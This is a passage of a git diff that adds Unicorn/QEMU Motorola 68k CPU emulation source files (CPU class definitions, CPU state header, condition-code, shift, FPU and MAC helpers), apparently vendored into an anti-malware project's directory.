class' reset handler. + * + * A Motorola 68k CPU model. + */ +typedef struct M68kCPUClass { + /*< private >*/ + CPUClass parent_class; + /*< public >*/ + + DeviceRealize parent_realize; + void (*parent_reset)(CPUState *cpu); +} M68kCPUClass; + +/** + * M68kCPU: + * @env: #CPUM68KState + * + * A Motorola 68k CPU. 
+ */ +typedef struct M68kCPU { + /*< private >*/ + CPUState parent_obj; + /*< public >*/ + + CPUM68KState env; +} M68kCPU; + +static inline M68kCPU *m68k_env_get_cpu(CPUM68KState *env) +{ + return container_of(env, M68kCPU, env); +} + +#define ENV_GET_CPU(e) CPU(m68k_env_get_cpu(e)) + +#define ENV_OFFSET offsetof(M68kCPU, env) + +void m68k_cpu_do_interrupt(CPUState *cpu); +bool m68k_cpu_exec_interrupt(CPUState *cpu, int int_req); +void m68k_cpu_dump_state(CPUState *cpu, FILE *f, fprintf_function cpu_fprintf, + int flags); +hwaddr m68k_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); +int m68k_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int m68k_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); + +void m68k_cpu_exec_enter(CPUState *cs); +void m68k_cpu_exec_exit(CPUState *cs); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.c new file mode 100644 index 0000000..f000648 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.c @@ -0,0 +1,242 @@ +/* + * QEMU Motorola 68k CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
+ * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see + * + */ + +#include "hw/m68k/m68k.h" +#include "cpu.h" +#include "qemu-common.h" + + +static void m68k_cpu_set_pc(CPUState *cs, vaddr value) +{ + M68kCPU *cpu = M68K_CPU(cs->uc, cs); + + cpu->env.pc = value; +} + +static bool m68k_cpu_has_work(CPUState *cs) +{ + return cs->interrupt_request & CPU_INTERRUPT_HARD; +} + +static void m68k_set_feature(CPUM68KState *env, int feature) +{ + env->features |= (1u << feature); +} + +/* CPUClass::reset() */ +static void m68k_cpu_reset(CPUState *s) +{ + M68kCPU *cpu = M68K_CPU(s->uc, s); + M68kCPUClass *mcc = M68K_CPU_GET_CLASS(s->uc, cpu); + CPUM68KState *env = &cpu->env; + + mcc->parent_reset(s); + + memset(env, 0, offsetof(CPUM68KState, features)); +#if !defined(CONFIG_USER_ONLY) + env->sr = 0x2700; +#endif + m68k_switch_sp(env); + /* ??? FP regs should be initialized to NaN. */ + env->cc_op = CC_OP_FLAGS; + /* TODO: We should set PC from the interrupt vector. 
*/ + env->pc = 0; + tlb_flush(s, 1); +} + +/* CPU models */ + +static ObjectClass *m68k_cpu_class_by_name(struct uc_struct *uc, const char *cpu_model) +{ + ObjectClass *oc; + char *typename; + + if (cpu_model == NULL) { + return NULL; + } + + typename = g_strdup_printf("%s-" TYPE_M68K_CPU, cpu_model); + oc = object_class_by_name(uc, typename); + g_free(typename); + if (oc != NULL && (object_class_dynamic_cast(uc, oc, TYPE_M68K_CPU) == NULL || + object_class_is_abstract(oc))) { + return NULL; + } + return oc; +} + +static void m5206_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + M68kCPU *cpu = M68K_CPU(uc, obj); + CPUM68KState *env = &cpu->env; + + m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); +} + +static void m5208_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + M68kCPU *cpu = M68K_CPU(uc, obj); + CPUM68KState *env = &cpu->env; + + m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); + m68k_set_feature(env, M68K_FEATURE_CF_ISA_APLUSC); + m68k_set_feature(env, M68K_FEATURE_BRAL); + m68k_set_feature(env, M68K_FEATURE_CF_EMAC); + m68k_set_feature(env, M68K_FEATURE_USP); +} + +static void cfv4e_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + M68kCPU *cpu = M68K_CPU(uc, obj); + CPUM68KState *env = &cpu->env; + + m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); + m68k_set_feature(env, M68K_FEATURE_CF_ISA_B); + m68k_set_feature(env, M68K_FEATURE_BRAL); + m68k_set_feature(env, M68K_FEATURE_CF_FPU); + m68k_set_feature(env, M68K_FEATURE_CF_EMAC); + m68k_set_feature(env, M68K_FEATURE_USP); +} + +static void any_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + M68kCPU *cpu = M68K_CPU(uc, obj); + CPUM68KState *env = &cpu->env; + + m68k_set_feature(env, M68K_FEATURE_CF_ISA_A); + m68k_set_feature(env, M68K_FEATURE_CF_ISA_B); + m68k_set_feature(env, M68K_FEATURE_CF_ISA_APLUSC); + m68k_set_feature(env, M68K_FEATURE_BRAL); + m68k_set_feature(env, M68K_FEATURE_CF_FPU); + /* MAC and EMAC are mututally exclusive, so pick EMAC. 
+ It's mostly backwards compatible. */ + m68k_set_feature(env, M68K_FEATURE_CF_EMAC); + m68k_set_feature(env, M68K_FEATURE_CF_EMAC_B); + m68k_set_feature(env, M68K_FEATURE_USP); + m68k_set_feature(env, M68K_FEATURE_EXT_FULL); + m68k_set_feature(env, M68K_FEATURE_WORD_INDEX); +} + +typedef struct M68kCPUInfo { + const char *name; + void (*instance_init)(struct uc_struct *uc, Object *obj, void *opaque); +} M68kCPUInfo; + +static const M68kCPUInfo m68k_cpus[] = { + { "m5206", m5206_cpu_initfn }, + { "m5208", m5208_cpu_initfn }, + { "cfv4e", cfv4e_cpu_initfn }, + { "any", any_cpu_initfn }, +}; + +static int m68k_cpu_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + CPUState *cs = CPU(dev); + M68kCPUClass *mcc = M68K_CPU_GET_CLASS(uc, dev); + + cpu_reset(cs); + qemu_init_vcpu(cs); + + mcc->parent_realize(cs->uc, dev, errp); + + return 0; +} + +static void m68k_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + CPUState *cs = CPU(obj); + M68kCPU *cpu = M68K_CPU(uc, obj); + CPUM68KState *env = &cpu->env; + + cs->env_ptr = env; + cpu_exec_init(env, opaque); + + if (tcg_enabled(uc)) { + m68k_tcg_init(uc); + } +} + +static void m68k_cpu_class_init(struct uc_struct *uc, ObjectClass *c, void *data) +{ + M68kCPUClass *mcc = M68K_CPU_CLASS(uc, c); + CPUClass *cc = CPU_CLASS(uc, c); + DeviceClass *dc = DEVICE_CLASS(uc, c); + + mcc->parent_realize = dc->realize; + dc->realize = m68k_cpu_realizefn; + + mcc->parent_reset = cc->reset; + cc->reset = m68k_cpu_reset; + + cc->class_by_name = m68k_cpu_class_by_name; + cc->has_work = m68k_cpu_has_work; + cc->do_interrupt = m68k_cpu_do_interrupt; + cc->cpu_exec_interrupt = m68k_cpu_exec_interrupt; + cc->set_pc = m68k_cpu_set_pc; +#ifdef CONFIG_USER_ONLY + cc->handle_mmu_fault = m68k_cpu_handle_mmu_fault; +#else + cc->get_phys_page_debug = m68k_cpu_get_phys_page_debug; +#endif + cc->cpu_exec_enter = m68k_cpu_exec_enter; + cc->cpu_exec_exit = m68k_cpu_exec_exit; +} + +static void register_cpu_type(void 
*opaque, const M68kCPUInfo *info) +{ + TypeInfo type_info = {0}; + type_info.parent = TYPE_M68K_CPU, + type_info.instance_init = info->instance_init, + + type_info.name = g_strdup_printf("%s-" TYPE_M68K_CPU, info->name); + type_register(opaque, &type_info); + g_free((void *)type_info.name); +} + +void m68k_cpu_register_types(void *opaque) +{ + const TypeInfo m68k_cpu_type_info = { + TYPE_M68K_CPU, + TYPE_CPU, + + sizeof(M68kCPUClass), + sizeof(M68kCPU), + opaque, + + m68k_cpu_initfn, + NULL, + NULL, + + NULL, + + m68k_cpu_class_init, + NULL, + NULL, + + true, + }; + + int i; + + type_register_static(opaque, &m68k_cpu_type_info); + for (i = 0; i < ARRAY_SIZE(m68k_cpus); i++) { + register_cpu_type(opaque, &m68k_cpus[i]); + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.h new file mode 100644 index 0000000..40f66b4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/cpu.h @@ -0,0 +1,259 @@ +/* + * m68k virtual CPU header + * + * Copyright (c) 2005-2007 CodeSourcery + * Written by Paul Brook + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ +#ifndef CPU_M68K_H +#define CPU_M68K_H + +#define TARGET_LONG_BITS 32 + +#define CPUArchState struct CPUM68KState + +#include "config.h" +#include "qemu-common.h" +#include "exec/cpu-defs.h" + +#include "fpu/softfloat.h" + +#define MAX_QREGS 32 + +#define TARGET_HAS_ICE 1 + +#define ELF_MACHINE EM_68K + +#define EXCP_ACCESS 2 /* Access (MMU) error. */ +#define EXCP_ADDRESS 3 /* Address error. */ +#define EXCP_ILLEGAL 4 /* Illegal instruction. */ +#define EXCP_DIV0 5 /* Divide by zero */ +#define EXCP_PRIVILEGE 8 /* Privilege violation. */ +#define EXCP_TRACE 9 +#define EXCP_LINEA 10 /* Unimplemented line-A (MAC) opcode. */ +#define EXCP_LINEF 11 /* Unimplemented line-F (FPU) opcode. */ +#define EXCP_DEBUGNBP 12 /* Non-breakpoint debug interrupt. */ +#define EXCP_DEBEGBP 13 /* Breakpoint debug interrupt. */ +#define EXCP_FORMAT 14 /* RTE format error. */ +#define EXCP_UNINITIALIZED 15 +#define EXCP_TRAP0 32 /* User trap #0. */ +#define EXCP_TRAP15 47 /* User trap #15. */ +#define EXCP_UNSUPPORTED 61 +#define EXCP_ICE 13 + +#define EXCP_RTE 0x100 +#define EXCP_HALT_INSN 0x101 + +#define NB_MMU_MODES 2 + +typedef struct CPUM68KState { + uint32_t dregs[8]; + uint32_t aregs[8]; + uint32_t pc; + uint32_t sr; + + /* SSP and USP. The current_sp is stored in aregs[7], the other here. */ + int current_sp; + uint32_t sp[2]; + + /* Condition flags. */ + uint32_t cc_op; + uint32_t cc_dest; + uint32_t cc_src; + uint32_t cc_x; + + float64 fregs[8]; + float64 fp_result; + uint32_t fpcr; + uint32_t fpsr; + float_status fp_status; + + uint64_t mactmp; + /* EMAC Hardware deals with 48-bit values composed of one 32-bit and + two 8-bit parts. We store a single 64-bit value and + rearrange/extend this when changing modes. */ + uint64_t macc[4]; + uint32_t macsr; + uint32_t mac_mask; + + /* Temporary storage for DIV helpers. */ + uint32_t div1; + uint32_t div2; + + /* MMU status. */ + struct { + uint32_t ar; + } mmu; + + /* Control registers. 
*/ + uint32_t vbr; + uint32_t mbar; + uint32_t rambar0; + uint32_t cacr; + + int pending_vector; + int pending_level; + + uint32_t qregs[MAX_QREGS]; + + CPU_COMMON + + /* Fields from here on are preserved across CPU reset. */ + uint32_t features; + + // Unicorn engine + struct uc_struct *uc; +} CPUM68KState; + +#include "cpu-qom.h" + +void m68k_tcg_init(struct uc_struct *uc); +M68kCPU *cpu_m68k_init(struct uc_struct *uc, const char *cpu_model); +int cpu_m68k_exec(struct uc_struct *uc, CPUM68KState *s); +/* you can call this signal handler from your SIGBUS and SIGSEGV + signal handlers to inform the virtual CPU of exceptions. non zero + is returned if the signal was handled by the virtual CPU. */ +int cpu_m68k_signal_handler(int host_signum, void *pinfo, + void *puc); +void cpu_m68k_flush_flags(CPUM68KState *, int); + +enum { + CC_OP_DYNAMIC, /* Use env->cc_op */ + CC_OP_FLAGS, /* CC_DEST = CVZN, CC_SRC = unused */ + CC_OP_LOGIC, /* CC_DEST = result, CC_SRC = unused */ + CC_OP_ADD, /* CC_DEST = result, CC_SRC = source */ + CC_OP_SUB, /* CC_DEST = result, CC_SRC = source */ + CC_OP_CMPB, /* CC_DEST = result, CC_SRC = source */ + CC_OP_CMPW, /* CC_DEST = result, CC_SRC = source */ + CC_OP_ADDX, /* CC_DEST = result, CC_SRC = source */ + CC_OP_SUBX, /* CC_DEST = result, CC_SRC = source */ + CC_OP_SHIFT, /* CC_DEST = result, CC_SRC = carry */ +}; + +#define CCF_C 0x01 +#define CCF_V 0x02 +#define CCF_Z 0x04 +#define CCF_N 0x08 +#define CCF_X 0x10 + +#define SR_I_SHIFT 8 +#define SR_I 0x0700 +#define SR_M 0x1000 +#define SR_S 0x2000 +#define SR_T 0x8000 + +#define M68K_SSP 0 +#define M68K_USP 1 + +/* CACR fields are implementation defined, but some bits are common. 
*/ +#define M68K_CACR_EUSP 0x10 + +#define MACSR_PAV0 0x100 +#define MACSR_OMC 0x080 +#define MACSR_SU 0x040 +#define MACSR_FI 0x020 +#define MACSR_RT 0x010 +#define MACSR_N 0x008 +#define MACSR_Z 0x004 +#define MACSR_V 0x002 +#define MACSR_EV 0x001 + +void m68k_set_irq_level(M68kCPU *cpu, int level, uint8_t vector); +void m68k_set_macsr(CPUM68KState *env, uint32_t val); +void m68k_switch_sp(CPUM68KState *env); + +#define M68K_FPCR_PREC (1 << 6) + +void do_m68k_semihosting(CPUM68KState *env, int nr); + +/* There are 4 ColdFire core ISA revisions: A, A+, B and C. + Each feature covers the subset of instructions common to the + ISA revisions mentioned. */ + +enum m68k_features { + M68K_FEATURE_CF_ISA_A, + M68K_FEATURE_CF_ISA_B, /* (ISA B or C). */ + M68K_FEATURE_CF_ISA_APLUSC, /* BIT/BITREV, FF1, STRLDSR (ISA A+ or C). */ + M68K_FEATURE_BRAL, /* Long unconditional branch. (ISA A+ or B). */ + M68K_FEATURE_CF_FPU, + M68K_FEATURE_CF_MAC, + M68K_FEATURE_CF_EMAC, + M68K_FEATURE_CF_EMAC_B, /* Revision B EMAC (dual accumulate). */ + M68K_FEATURE_USP, /* User Stack Pointer. (ISA A+, B or C). */ + M68K_FEATURE_EXT_FULL, /* 68020+ full extension word. */ + M68K_FEATURE_WORD_INDEX /* word sized address index registers. */ +}; + +static inline int m68k_feature(CPUM68KState *env, int feature) +{ + return (env->features & (1u << feature)) != 0; +} + +void m68k_cpu_list(FILE *f, fprintf_function cpu_fprintf); + +void register_m68k_insns (CPUM68KState *env); + +#ifdef CONFIG_USER_ONLY +/* Linux uses 8k pages. */ +#define TARGET_PAGE_BITS 13 +#else +/* Smallest TLB entry size is 1k. 
*/ +#define TARGET_PAGE_BITS 10 +#endif + +#define TARGET_PHYS_ADDR_SPACE_BITS 32 +#define TARGET_VIRT_ADDR_SPACE_BITS 32 + +static inline CPUM68KState *cpu_init(struct uc_struct *uc, const char *cpu_model) +{ + M68kCPU *cpu = cpu_m68k_init(uc, cpu_model); + if (cpu == NULL) { + return NULL; + } + return &cpu->env; +} + +#define cpu_exec cpu_m68k_exec +#define cpu_gen_code cpu_m68k_gen_code +#define cpu_signal_handler cpu_m68k_signal_handler +#define cpu_list m68k_cpu_list + +/* MMU modes definitions */ +#define MMU_MODE0_SUFFIX _kernel +#define MMU_MODE1_SUFFIX _user +#define MMU_USER_IDX 1 +static inline int cpu_mmu_index (CPUM68KState *env) +{ + return (env->sr & SR_S) == 0 ? 1 : 0; +} + +int m68k_cpu_handle_mmu_fault(CPUState *cpu, vaddr address, int rw, + int mmu_idx); + +#include "exec/cpu-all.h" + +static inline void cpu_get_tb_cpu_state(CPUM68KState *env, target_ulong *pc, + target_ulong *cs_base, int *flags) +{ + *pc = env->pc; + *cs_base = 0; + *flags = (env->fpcr & M68K_FPCR_PREC) /* Bit 6 */ + | (env->sr & SR_S) /* Bit 13 */ + | ((env->macsr >> 4) & 0xf); /* Bits 0-3 */ +} + +#include "exec/exec-all.h" + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.c new file mode 100644 index 0000000..3ecc496 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.c @@ -0,0 +1,799 @@ +/* + * m68k op helpers + * + * Copyright (c) 2006-2007 CodeSourcery + * Written by Paul Brook + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU + * General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" + +#include "exec/helper-proto.h" + +#define SIGNBIT (1u << 31) + +M68kCPU *cpu_m68k_init(struct uc_struct *uc, const char *cpu_model) +{ + M68kCPU *cpu; + CPUM68KState *env; + ObjectClass *oc; + + oc = cpu_class_by_name(uc, TYPE_M68K_CPU, cpu_model); + if (oc == NULL) { + return NULL; + } + cpu = M68K_CPU(uc, object_new(uc, object_class_get_name(oc))); + env = &cpu->env; + + register_m68k_insns(env); + + object_property_set_bool(uc, OBJECT(cpu), true, "realized", NULL); + + return cpu; +} + +void cpu_m68k_flush_flags(CPUM68KState *env, int cc_op) +{ + M68kCPU *cpu = m68k_env_get_cpu(env); + int flags; + uint32_t src; + uint32_t dest; + uint32_t tmp; + +#define HIGHBIT 0x80000000u + +#define SET_NZ(x) do { \ + if ((x) == 0) \ + flags |= CCF_Z; \ + else if ((int32_t)(x) < 0) \ + flags |= CCF_N; \ + } while (0) + +#define SET_FLAGS_SUB(type, utype) do { \ + SET_NZ((type)dest); \ + tmp = dest + src; \ + if ((utype) tmp < (utype) src) \ + flags |= CCF_C; \ + if ((1u << (sizeof(type) * 8 - 1)) & (tmp ^ dest) & (tmp ^ src)) \ + flags |= CCF_V; \ + } while (0) + + flags = 0; + src = env->cc_src; + dest = env->cc_dest; + switch (cc_op) { + case CC_OP_FLAGS: + flags = dest; + break; + case CC_OP_LOGIC: + SET_NZ(dest); + break; + case CC_OP_ADD: + SET_NZ(dest); + if (dest < src) + flags |= CCF_C; + tmp = dest - src; + if (HIGHBIT & (src ^ dest) & ~(tmp ^ src)) + flags |= CCF_V; + break; + case CC_OP_SUB: + SET_FLAGS_SUB(int32_t, uint32_t); + break; + case CC_OP_CMPB: + SET_FLAGS_SUB(int8_t, uint8_t); + break; + case CC_OP_CMPW: + SET_FLAGS_SUB(int16_t, uint16_t); + break; + case CC_OP_ADDX: + SET_NZ(dest); + if (dest <= src) + flags |= CCF_C; + tmp = dest - src - 1; + if (HIGHBIT & (src ^ dest) & ~(tmp ^ src)) + flags |= CCF_V; + break; + case CC_OP_SUBX: + SET_NZ(dest); + 
tmp = dest + src + 1; + if (tmp <= src) + flags |= CCF_C; + if (HIGHBIT & (tmp ^ dest) & (tmp ^ src)) + flags |= CCF_V; + break; + case CC_OP_SHIFT: + SET_NZ(dest); + if (src) + flags |= CCF_C; + break; + default: + cpu_abort(CPU(cpu), "Bad CC_OP %d", cc_op); + } + env->cc_op = CC_OP_FLAGS; + env->cc_dest = flags; +} + +void HELPER(movec)(CPUM68KState *env, uint32_t reg, uint32_t val) +{ + switch (reg) { + case 0x02: /* CACR */ + env->cacr = val; + m68k_switch_sp(env); + break; + case 0x04: case 0x05: case 0x06: case 0x07: /* ACR[0-3] */ + /* TODO: Implement Access Control Registers. */ + break; + case 0x801: /* VBR */ + env->vbr = val; + break; + /* TODO: Implement control registers. */ + default: + qemu_log("Unimplemented control register write 0x%x = 0x%x\n", + reg, val); + helper_raise_exception(env, EXCP_UNSUPPORTED); + } +} + +void HELPER(set_macsr)(CPUM68KState *env, uint32_t val) +{ + uint32_t acc; + int8_t exthigh; + uint8_t extlow; + uint64_t regval; + int i; + if ((env->macsr ^ val) & (MACSR_FI | MACSR_SU)) { + for (i = 0; i < 4; i++) { + regval = env->macc[i]; + exthigh = regval >> 40; + if (env->macsr & MACSR_FI) { + acc = regval >> 8; + extlow = regval; + } else { + acc = regval; + extlow = regval >> 32; + } + if (env->macsr & MACSR_FI) { + regval = (((uint64_t)acc) << 8) | extlow; + regval |= ((uint64_t)((int64_t)exthigh)) << 40; + } else if (env->macsr & MACSR_SU) { + regval = acc | (((int64_t)extlow) << 32); + regval |= ((uint64_t)((int64_t)exthigh)) << 40; + } else { + regval = acc | (((uint64_t)extlow) << 32); + regval |= ((uint64_t)(uint8_t)exthigh) << 40; + } + env->macc[i] = regval; + } + } + env->macsr = val; +} + +void m68k_switch_sp(CPUM68KState *env) +{ + int new_sp; + + env->sp[env->current_sp] = env->aregs[7]; + new_sp = (env->sr & SR_S && env->cacr & M68K_CACR_EUSP) + ? 
M68K_SSP : M68K_USP; + env->aregs[7] = env->sp[new_sp]; + env->current_sp = new_sp; +} + +#if defined(CONFIG_USER_ONLY) + +int m68k_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + M68kCPU *cpu = M68K_CPU(cs); + + cs->exception_index = EXCP_ACCESS; + cpu->env.mmu.ar = address; + return 1; +} + +#else + +/* MMU */ + +/* TODO: This will need fixing once the MMU is implemented. */ +hwaddr m68k_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) +{ + return addr; +} + +int m68k_cpu_handle_mmu_fault(CPUState *cs, vaddr address, int rw, + int mmu_idx) +{ + int prot; + + address &= TARGET_PAGE_MASK; + prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + tlb_set_page(cs, address, address, prot, mmu_idx, TARGET_PAGE_SIZE); + return 0; +} + +/* Notify CPU of a pending interrupt. Prioritization and vectoring should + be handled by the interrupt controller. Real hardware only requests + the vector when the interrupt is acknowledged by the CPU. For + simplicitly we calculate it when the interrupt is signalled. */ +void m68k_set_irq_level(M68kCPU *cpu, int level, uint8_t vector) +{ + CPUState *cs = CPU(cpu); + CPUM68KState *env = &cpu->env; + + env->pending_level = level; + env->pending_vector = vector; + if (level) { + cpu_interrupt(cs, CPU_INTERRUPT_HARD); + } else { + cpu_reset_interrupt(cs, CPU_INTERRUPT_HARD); + } +} + +#endif + +uint32_t HELPER(bitrev)(uint32_t x) +{ + x = ((x >> 1) & 0x55555555u) | ((x << 1) & 0xaaaaaaaau); + x = ((x >> 2) & 0x33333333u) | ((x << 2) & 0xccccccccu); + x = ((x >> 4) & 0x0f0f0f0fu) | ((x << 4) & 0xf0f0f0f0u); + return bswap32(x); +} + +uint32_t HELPER(ff1)(uint32_t x) +{ + int n; + for (n = 32; x; n--) + x >>= 1; + return n; +} + +uint32_t HELPER(sats)(uint32_t val, uint32_t ccr) +{ + /* The result has the opposite sign to the original value. 
*/ + if (ccr & CCF_V) + val = (((int32_t)val) >> 31) ^ SIGNBIT; + return val; +} + +uint32_t HELPER(subx_cc)(CPUM68KState *env, uint32_t op1, uint32_t op2) +{ + uint32_t res; + uint32_t old_flags; + + old_flags = env->cc_dest; + if (env->cc_x) { + env->cc_x = (op1 <= op2); + env->cc_op = CC_OP_SUBX; + res = op1 - (op2 + 1); + } else { + env->cc_x = (op1 < op2); + env->cc_op = CC_OP_SUB; + res = op1 - op2; + } + env->cc_dest = res; + env->cc_src = op2; + cpu_m68k_flush_flags(env, env->cc_op); + /* !Z is sticky. */ + env->cc_dest &= (old_flags | ~CCF_Z); + return res; +} + +uint32_t HELPER(addx_cc)(CPUM68KState *env, uint32_t op1, uint32_t op2) +{ + uint32_t res; + uint32_t old_flags; + + old_flags = env->cc_dest; + if (env->cc_x) { + res = op1 + op2 + 1; + env->cc_x = (res <= op2); + env->cc_op = CC_OP_ADDX; + } else { + res = op1 + op2; + env->cc_x = (res < op2); + env->cc_op = CC_OP_ADD; + } + env->cc_dest = res; + env->cc_src = op2; + cpu_m68k_flush_flags(env, env->cc_op); + /* !Z is sticky. 
*/ + env->cc_dest &= (old_flags | ~CCF_Z); + return res; +} + +uint32_t HELPER(xflag_lt)(uint32_t a, uint32_t b) +{ + return a < b; +} + +void HELPER(set_sr)(CPUM68KState *env, uint32_t val) +{ + env->sr = val & 0xffff; + m68k_switch_sp(env); +} + +uint32_t HELPER(shl_cc)(CPUM68KState *env, uint32_t val, uint32_t shift) +{ + uint32_t result; + uint32_t cf; + + shift &= 63; + if (shift == 0) { + result = val; + cf = env->cc_src & CCF_C; + } else if (shift < 32) { + result = val << shift; + cf = (val >> (32 - shift)) & 1; + } else if (shift == 32) { + result = 0; + cf = val & 1; + } else /* shift > 32 */ { + result = 0; + cf = 0; + } + env->cc_src = cf; + env->cc_x = (cf != 0); + env->cc_dest = result; + return result; +} + +uint32_t HELPER(shr_cc)(CPUM68KState *env, uint32_t val, uint32_t shift) +{ + uint32_t result; + uint32_t cf; + + shift &= 63; + if (shift == 0) { + result = val; + cf = env->cc_src & CCF_C; + } else if (shift < 32) { + result = val >> shift; + cf = (val >> (shift - 1)) & 1; + } else if (shift == 32) { + result = 0; + cf = val >> 31; + } else /* shift > 32 */ { + result = 0; + cf = 0; + } + env->cc_src = cf; + env->cc_x = (cf != 0); + env->cc_dest = result; + return result; +} + +uint32_t HELPER(sar_cc)(CPUM68KState *env, uint32_t val, uint32_t shift) +{ + uint32_t result; + uint32_t cf; + + shift &= 63; + if (shift == 0) { + result = val; + cf = (env->cc_src & CCF_C) != 0; + } else if (shift < 32) { + result = (int32_t)val >> shift; + cf = (val >> (shift - 1)) & 1; + } else /* shift >= 32 */ { + result = (int32_t)val >> 31; + cf = val >> 31; + } + env->cc_src = cf; + env->cc_x = cf; + env->cc_dest = result; + return result; +} + +/* FPU helpers. 
*/ +uint32_t HELPER(f64_to_i32)(CPUM68KState *env, float64 val) +{ + return float64_to_int32(val, &env->fp_status); +} + +float32 HELPER(f64_to_f32)(CPUM68KState *env, float64 val) +{ + return float64_to_float32(val, &env->fp_status); +} + +float64 HELPER(i32_to_f64)(CPUM68KState *env, uint32_t val) +{ + return int32_to_float64(val, &env->fp_status); +} + +float64 HELPER(f32_to_f64)(CPUM68KState *env, float32 val) +{ + return float32_to_float64(val, &env->fp_status); +} + +float64 HELPER(iround_f64)(CPUM68KState *env, float64 val) +{ + return float64_round_to_int(val, &env->fp_status); +} + +float64 HELPER(itrunc_f64)(CPUM68KState *env, float64 val) +{ + return float64_trunc_to_int(val, &env->fp_status); +} + +float64 HELPER(sqrt_f64)(CPUM68KState *env, float64 val) +{ + return float64_sqrt(val, &env->fp_status); +} + +float64 HELPER(abs_f64)(float64 val) +{ + return float64_abs(val); +} + +float64 HELPER(chs_f64)(float64 val) +{ + return float64_chs(val); +} + +float64 HELPER(add_f64)(CPUM68KState *env, float64 a, float64 b) +{ + return float64_add(a, b, &env->fp_status); +} + +float64 HELPER(sub_f64)(CPUM68KState *env, float64 a, float64 b) +{ + return float64_sub(a, b, &env->fp_status); +} + +float64 HELPER(mul_f64)(CPUM68KState *env, float64 a, float64 b) +{ + return float64_mul(a, b, &env->fp_status); +} + +float64 HELPER(div_f64)(CPUM68KState *env, float64 a, float64 b) +{ + return float64_div(a, b, &env->fp_status); +} + +float64 HELPER(sub_cmp_f64)(CPUM68KState *env, float64 a, float64 b) +{ + /* ??? This may incorrectly raise exceptions. */ + /* ??? Should flush denormals to zero. */ + float64 res; + res = float64_sub(a, b, &env->fp_status); + if (float64_is_quiet_nan(res)) { + /* +/-inf compares equal against itself, but sub returns nan. 
*/ + if (!float64_is_quiet_nan(a) + && !float64_is_quiet_nan(b)) { + res = float64_zero; + if (float64_lt_quiet(a, res, &env->fp_status)) + res = float64_chs(res); + } + } + return res; +} + +uint32_t HELPER(compare_f64)(CPUM68KState *env, float64 val) +{ + return float64_compare_quiet(val, float64_zero, &env->fp_status); +} + +/* MAC unit. */ +/* FIXME: The MAC unit implementation is a bit of a mess. Some helpers + take values, others take register numbers and manipulate the contents + in-place. */ +void HELPER(mac_move)(CPUM68KState *env, uint32_t dest, uint32_t src) +{ + uint32_t mask; + env->macc[dest] = env->macc[src]; + mask = MACSR_PAV0 << dest; + if (env->macsr & (MACSR_PAV0 << src)) + env->macsr |= mask; + else + env->macsr &= ~mask; +} + +uint64_t HELPER(macmuls)(CPUM68KState *env, uint32_t op1, uint32_t op2) +{ + int64_t product; + int64_t res; + + product = (uint64_t)op1 * op2; + res = ((int64_t)(((uint64_t)product) << 24)) >> 24; + if (res != product) { + env->macsr |= MACSR_V; + if (env->macsr & MACSR_OMC) { + /* Make sure the accumulate operation overflows. */ + if (product < 0) + res = ~(1ll << 50); + else + res = 1ll << 50; + } + } + return res; +} + +uint64_t HELPER(macmulu)(CPUM68KState *env, uint32_t op1, uint32_t op2) +{ + uint64_t product; + + product = (uint64_t)op1 * op2; + if (product & (0xffffffull << 40)) { + env->macsr |= MACSR_V; + if (env->macsr & MACSR_OMC) { + /* Make sure the accumulate operation overflows. 
